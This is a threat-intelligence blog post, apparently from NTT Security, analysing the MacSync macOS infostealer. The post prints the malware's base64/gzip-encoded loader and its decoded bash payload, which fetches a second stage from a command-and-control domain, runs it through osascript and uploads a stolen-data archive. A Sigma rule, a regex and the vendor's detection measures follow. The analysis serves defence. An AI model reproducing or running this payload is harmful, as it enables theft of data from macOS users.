top of page

MacSync Infostealer: An Overview of Recent macOS Threat Activity

  • Mar 11
  • 3 min read
Analyst looking for threats

Background

MacSync is an infostealer targeting macOS. It is a rebranded version of Mac.c that first appeared in April 2025 and is a Go‑based agent with information‑stealing and remote command‑and‑control (C2 or C&C) capabilities.


Researchers at the software company Jamf identified a new variant of MacSync delivered through a digitally signed and notarized Swift application, instead of previous tactics that relied on Click‑Fix delivery. This method marks a significant evolution, as it removes the need for direct terminal interaction and allows the malware to bypass Apple’s Gatekeeper and XProtect security controls.


Detection

The malware employs several evasion techniques, such as inflating the file size to 25.5 MB using unrelated PDF documents. It also performs various checks to avoid sandbox detection before executing an encoded payload, such as the one shown below:


/bin/zsh
d6632=$(base64 -d <<'PAYLOAD_m29866333712064'
gunzip
H4sIADjXCWkAA+VUXWvbMBR9z6+4c0NJYLak+Dtd1pbC1tGFDpKxwjaCLMuOiCwZW1nTbvvvcz5I
3TQvextMT+bccy6651zr5BVKhEIJreedlPJCq1m2VMwIrXp9+NmB5vAVZ/AGpfwHUkspn7C3R7DB
AbgQUlIpYcqrQii6BaVmVEKqCyrUyLoXMs10VawcpgurRTB6wZt65mGfJCxxs5BQ1w/jzA38JIy5
5w8CGkbYS3nqMerHIQsjyiIcx1EaeCSJozWt3ZKWYrbgDyPLJzHmGQldl0QuxSkL3CwJBm7TP/OD
NNiKRAZfoXsCdm4Aw/czMHOuNpX1YctKgr0AuwbbLujKNqLg4GKwr8H6XPPKvsy5MkMY68e1Dch3
MPTGlAlldD0/gw/KcAkNALcTuAOCZ8SfhX24LEvJv/DkRhjku6HjBtC7uZ6OP74GKRYc3nO20H24
mle64CgmDnY8Lxw4hHgwoRmtxE5mba7SDG03Qw+huxvfAmtuTFkPEepuU0Dpg6KFYOdmlY66G+NP
y/vmk1jwC3RNa1aJ0mxzljX/Tzx4OXwmWotxDrbiRxaDr4QB0ubvbbqDT7eTKXzbc/8low5udcSz
AwaTQ8DP0fYS4GeVd2BlQvLRBTJFiRpbpc5zoXLnUZTWITNZNq9CO4hW/UVwOTW7v/yvw/ndadgH
Lx9Y3QsLTp9kGwnu7Bd/16KR/wHdmV3fQAUAAA==
PAYLOAD_m29866333712064
eval "$d6632"

The payload is Base64‑encoded and compressed with gzip. The decoded payload is shown below:

#!/bin/bash
daemon_function() {
    exec </dev/null
    exec >/dev/null
    exec 2>/dev/null
    killall Terminal
    local domain="wildformx.com"
    local token="f4051bcb3f71a3579f365b79e4526a7804ded4ca597c78ac80998d641b98b79e"
    local api_key="5190ef1733183a0dc63fb623357f56d6"
    if [ $# -gt 0 ]; then
        curl -k -s --max-time 30 -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36" -H "api-key: $api_key" "hxxps://$domain/dynamic?txd=$token&pwd=$1" | osascript
    else
        curl -k -s --max-time 30 -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36" -H "api-key: $api_key" "hxxps://$domain/dynamic?txd=$token" | osascript
    fi
    if [ $? -ne 0 ]; then
        exit 1
    fi
    curl -k -X POST \
         -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36" \
         -H "api-key: $api_key" \
         -H "cl: 0" \
         --max-time 300 \
         -F "file=@/tmp/osalogging.zip" \
         -F "buildtxd=$token" \
         "hxxps://$domain/gate"
    
    if [ $? -ne 0 ]; then
        exit 1
    fi
}
if daemon_function "$@" & then
    exit 0
else
    exit 1
fi

Upon execution, the malware attempts to retrieve a second‑stage payload from hxxps://$domain/dynamic?txd=$token and executes it using osascript, a built‑in macOS command‑line utility used to run Open Scripting Architecture (OSA) scripts.


A VirusTotal correlation search for the URI pattern /dynamic\?txd= returned more than 300 matches, many of which are flagged as malicious by multiple security vendors. The earliest observation dates back to 2025‑09‑20, indicating that this URI structure has been consistently used by the malware and represents a strong candidate for detection logic.


Further analysis of the $token parameter shows that it is a 64‑character hexadecimal string. Based on this, the following regex can be used to reliably detect the malware’s URI query pattern in network traffic:

^txd=[0-9a-fA-F]{64}

Sigma rule

title: Potential MacSync C2 traffic
id: 0e5690a9-8d53-45bd-b9d5-7c18bcaf1d4e
description: InfoStealer targeting MacOS. Detects requests to sepecific URI patterns
observed in recent compaign telemetry.
status: experimental
author: Amata Anantaprayoon
date: 2026-02-11
modified: 2026-02-11
logsource:
category: proxy
detection:
selection:
uri_path: /dynamic
uri_query|re: '^txd=[0-9a-fA-F]{64}'
condition: selection
falsepositives:
- Web application endpoints that legitimately use matching paths
level: critical

How NTT Security Protects Against MacSync

  • NTT has created a hunting query to identify the malware’s command‑and‑control (C2) servers using VirusTotal intelligence. Newly discovered C2 servers are automatically added to NTT’s internal threat list. Any network traffic directed toward these servers triggers an alert to the SOC for immediate review.


  • A Sigma rule reflecting the MacSync C2 pattern has been deployed within NTT’s threat‑hunting engine. If network activity matches this behavior, the engine generates a notification to the SOC, enabling rapid investigation and response.


References


 
 
bottom of page